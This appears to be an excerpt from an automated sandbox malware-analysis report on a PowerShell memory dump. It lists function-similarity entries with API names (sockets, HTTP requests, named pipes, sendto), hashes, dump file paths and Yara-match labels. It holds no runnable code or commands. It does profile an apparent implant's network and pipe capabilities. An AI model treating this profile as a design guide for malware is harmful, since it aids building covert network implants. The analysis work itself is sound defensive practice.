                                                                                        • Opcode ID: a8e030845fe4758d993a7963f5bece760aec5d07471d771b574ece67649364e1
                                                                                        • Instruction ID: db633ca5e3e72b49b694c3255fa9438a3c06f8e7687ac0f5393d448177984876
                                                                                        • Opcode Fuzzy Hash: a8e030845fe4758d993a7963f5bece760aec5d07471d771b574ece67649364e1
                                                                                        • Instruction Fuzzy Hash:
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: acceptioctlsocket$closesockethtonlselect
                                                                                        • String ID:
                                                                                        • API String ID: 2003300010-0
                                                                                        • Opcode ID: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
                                                                                        • Instruction ID: 88e798b1580394a609a3594237eaa6a9ba562c5305f1a7608a69dc5336f8532d
                                                                                        • Opcode Fuzzy Hash: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
                                                                                        • Instruction Fuzzy Hash: E8919E7A312A90DAE720CF29EA403DE33B1F79A798F180125DB4D47A95DF39C569C701
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _snprintf$CloseHandleHttpInternetRequest$OpenSendSleep
                                                                                        • String ID: %s%s$*/*
                                                                                        • API String ID: 3787158362-856325523
                                                                                        • Opcode ID: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
                                                                                        • Instruction ID: 844909925073e6304a81685cee61aaa4b64cbb901467aaf6e1ecd5ca050a212f
                                                                                        • Opcode Fuzzy Hash: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
                                                                                        • Instruction Fuzzy Hash: 1A81687A302A84D9EB10DB69E9443DD73A1F3A7788F480222EA5D537A5DF3CC50AC712
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _snprintf$Internet$CloseHandleHttpRequeststrchr$AvailableDataFileOpenQueryReadSend_errno_invalid_parameter_noinfo
                                                                                        • String ID: %s%s$*/*
                                                                                        • API String ID: 3536628738-856325523
                                                                                        • Opcode ID: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
                                                                                        • Instruction ID: 8c68e09657d9ba158914ce53dd4bcff5f63cf8c38cfbcc7e9f84e4f2b7b5ce7b
                                                                                        • Opcode Fuzzy Hash: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
                                                                                        • Instruction Fuzzy Hash: CE71D53A701680C6EB20DF69E5447DE63A1F7A7B98F480112EE5967B95DF3CC50AC701
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$CountNamedPipeTick$CreateDisconnectFileHandleSleepStateWait
                                                                                        • String ID:
                                                                                        • API String ID: 34948862-0
                                                                                        • Opcode ID: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
                                                                                        • Instruction ID: 269bfc6c6679682c73fe67d28bf4dde80e98c7005b3651539caac75c55d30109
                                                                                        • Opcode Fuzzy Hash: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
                                                                                        • Instruction Fuzzy Hash: EC417F3A706B00C6F710DB69E8447DD2761E3ABBA4F595221DE6A47B94CF3DC44A8702
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ApisByteCharErrorFileLastMultiPackagedWide__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 1138158220-0
                                                                                        • Opcode ID: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
                                                                                        • Instruction ID: 2679eed42731fa08e810216d192a3e30b99db2c43e0886aa64482a9f97d481fd
                                                                                        • Opcode Fuzzy Hash: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
                                                                                        • Instruction Fuzzy Hash: 07319E3D702B40C6FB24DB2A98043AE67E1ABA7B96F1C06249A55477D6DF3DC4498302
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                        • String ID:
                                                                                        • API String ID: 4099253644-0
                                                                                        • Opcode ID: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
                                                                                        • Instruction ID: 9c3ea1efd451926f39b9285c558557f10a16b4504cb41d3bef4bd4ad02936ecb
                                                                                        • Opcode Fuzzy Hash: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
                                                                                        • Instruction Fuzzy Hash: C431FB3E313E40E1FE54EB5DE8503EA23A0AB7BB96F4C16259919562E1CF6D844D8313
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
                                                                                        • String ID: d
                                                                                        • API String ID: 1257931466-2564639436
                                                                                        • Opcode ID: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
                                                                                        • Instruction ID: 73cf31aa9e50f1257fc53aaf5d350af741f7bce208f3b8ba2bb7fe48bf6624fa
                                                                                        • Opcode Fuzzy Hash: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
                                                                                        • Instruction Fuzzy Hash: B7318E3A325B80C6D720CF55E8443DE73A0F78AB88F091026EA8D43B64DF79C559CB41
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: write_multi_char$write_string$free
                                                                                        • String ID:
                                                                                        • API String ID: 2630409672-3916222277
                                                                                        • Opcode ID: a98f2533e89297d6825b7c4f6c9a926d6158e6b7171972381b0d6ae3b2a7e262
                                                                                        • Instruction ID: 0db256afc8614cbeb0ed05c725cb587498eec9860d407d347b61c22bc01adf7f
                                                                                        • Opcode Fuzzy Hash: a98f2533e89297d6825b7c4f6c9a926d6158e6b7171972381b0d6ae3b2a7e262
                                                                                        • Instruction Fuzzy Hash: A8A1C03A709744C6FB61CB69A5003EE6BA0B7A77C4F1C4106DF4957AD9EB38C949CB02
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$ErrorLastSleepselectsend
                                                                                        • String ID: d
                                                                                        • API String ID: 2152284305-2564639436
                                                                                        • Opcode ID: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
                                                                                        • Instruction ID: 2ac0ad124fd3ac7008b086592cc3abf753b0681c86ec8b95e44f79538bedd794
                                                                                        • Opcode Fuzzy Hash: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
                                                                                        • Instruction Fuzzy Hash: 63219C7A325A80C6E770CF25E8883CE73A1F79A7C4F480125EB9D47A94DF39C4598B85
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CountErrorLastSleepTickWrite$BuffersDisconnectFlushNamedPipe
                                                                                        • String ID:
                                                                                        • API String ID: 3101085627-0
                                                                                        • Opcode ID: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
                                                                                        • Instruction ID: 94d0cbf4c2ffddf6fa1d528a8e322a43ba6f223dc185dcd73a86be2e68100135
                                                                                        • Opcode Fuzzy Hash: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
                                                                                        • Instruction Fuzzy Hash: 7F416D3A711A00CAEB20EFB9D5883DC2361E767B88F9901229E5957A69DF38C50DC342
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 388111225-0
                                                                                        • Opcode ID: 49b09f2d48ef8df8588a2b31a64592898f93a6aae785ba82b089c67bc61753ed
                                                                                        • Instruction ID: ddf870b13bd8653e6f40b4dccad81cda7493dd15fabfd633d960a8a449e7376a
                                                                                        • Opcode Fuzzy Hash: 49b09f2d48ef8df8588a2b31a64592898f93a6aae785ba82b089c67bc61753ed
                                                                                        • Instruction Fuzzy Hash: 5E31223A302280C6E316EF6D98413ED2654A7A37E0FAD8129AA21573D7EA38C44DD352
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 388111225-0
                                                                                        • Opcode ID: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
                                                                                        • Instruction ID: ef728dd62a600dc18b95b309937c863e8b3b0a60a8925d8bbc2226de03588c10
                                                                                        • Opcode Fuzzy Hash: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
                                                                                        • Instruction Fuzzy Hash: 7C31E43AB13690C6E716EF6DD8413ED3651ABA37A0FAD4215EA21177D3C738C849C712
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 1812809483-0
                                                                                        • Opcode ID: bd2089a42f628a497311986bb7142f0c797ae3413767483a07d765319bf433f4
                                                                                        • Instruction ID: 99b6c2f0ecf48342d6199705de56e6e26b756e4b992acaf4687755a4c9428ee0
                                                                                        • Opcode Fuzzy Hash: bd2089a42f628a497311986bb7142f0c797ae3413767483a07d765319bf433f4
                                                                                        • Instruction Fuzzy Hash: 4C41E27D716251C2FB64EB2D85013EA73E4E777BE4F984221EA9443AC5F728C849C702
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 1812809483-0
                                                                                        • Opcode ID: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
                                                                                        • Instruction ID: 22d32c0df0ad22e92118b65320bd7d60467159bbf19e7d401e6f083ff45f2865
                                                                                        • Opcode Fuzzy Hash: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
                                                                                        • Instruction Fuzzy Hash: A841F57E703291C7FB60EB1995403ED37E1E777B94F9C4121EA90476CAD724C8698702
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Pointer$Decode$EncodeExitProcess$__crt_amsg_exit_mtinitlocknum
                                                                                        • String ID:
                                                                                        • API String ID: 1550138920-0
                                                                                        • Opcode ID: c0449f3fef6a4d8576451ebf1d27e0541d416188840e9d96df55a1b66d98fc2d
                                                                                        • Instruction ID: 046d6e5be29685b4979ba25ef1ce463172d26bc07de32524ed2d3d654f0c3996
                                                                                        • Opcode Fuzzy Hash: c0449f3fef6a4d8576451ebf1d27e0541d416188840e9d96df55a1b66d98fc2d
                                                                                        • Instruction Fuzzy Hash: 51414A3D327A40D6E660DF19F940399A3A0F7ABBC4F4C0425AA8E537A5DF39C49D8702
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
                                                                                        • String ID:
                                                                                        • API String ID: 3339321253-0
                                                                                        • Opcode ID: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
                                                                                        • Instruction ID: b60269b8c1a4946ead0f10a1916c8c98440f852b8f14817213f52aeb42a4eeb9
                                                                                        • Opcode Fuzzy Hash: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
                                                                                        • Instruction Fuzzy Hash: CB312239311680C2EB30DF29E9543EEA361F757B98F180124DE1A07298EE3CC64EC701
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$freehtonlshutdown$ErrorLastacceptclosesocketioctlsocketmallocrecvfromselect
                                                                                        • String ID:
                                                                                        • API String ID: 3610715900-0
                                                                                        • Opcode ID: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
                                                                                        • Instruction ID: 85c20a58e9c0caafe69189248aaf3a8aa7e453115e3bdeaa4130294a07bbec2d
                                                                                        • Opcode Fuzzy Hash: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
                                                                                        • Instruction Fuzzy Hash: 2431A27D312A41C2EB60CF2AD9443AD23B0F76BB88F1C4125CA9947295DF3AC45AC743
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
                                                                                        • String ID:
                                                                                        • API String ID: 310312816-0
                                                                                        • Opcode ID: 689ddd4190ac18ee6f3a072d0937668feab07145efaf470236796ea297ffc133
                                                                                        • Instruction ID: 412bd5561fc4e4b2bec2e18ae32b46e70fa832739f54d2889fe971ba0685cc3f
                                                                                        • Opcode Fuzzy Hash: 689ddd4190ac18ee6f3a072d0937668feab07145efaf470236796ea297ffc133
                                                                                        • Instruction Fuzzy Hash: DF21323A702240C6F705EF2CD8413ED6650ABA37E1F6D8114BA15077D7EB788849D326
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
                                                                                        • String ID:
                                                                                        • API String ID: 4140391395-0
                                                                                        • Opcode ID: 43d75af09cf974c8da12c00f0caf2e030efb182ec464fb3533e4fccbb0b59705
                                                                                        • Instruction ID: 7aaff8d41532997499098cf742b243d4da6436db0e9932a92b856ce79fe957a2
                                                                                        • Opcode Fuzzy Hash: 43d75af09cf974c8da12c00f0caf2e030efb182ec464fb3533e4fccbb0b59705
                                                                                        • Instruction Fuzzy Hash: C821DE7A702240C1F705AF2D98053EDA651A7A3BF1F4DC304AA35073D3E73884498362
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
                                                                                        • String ID:
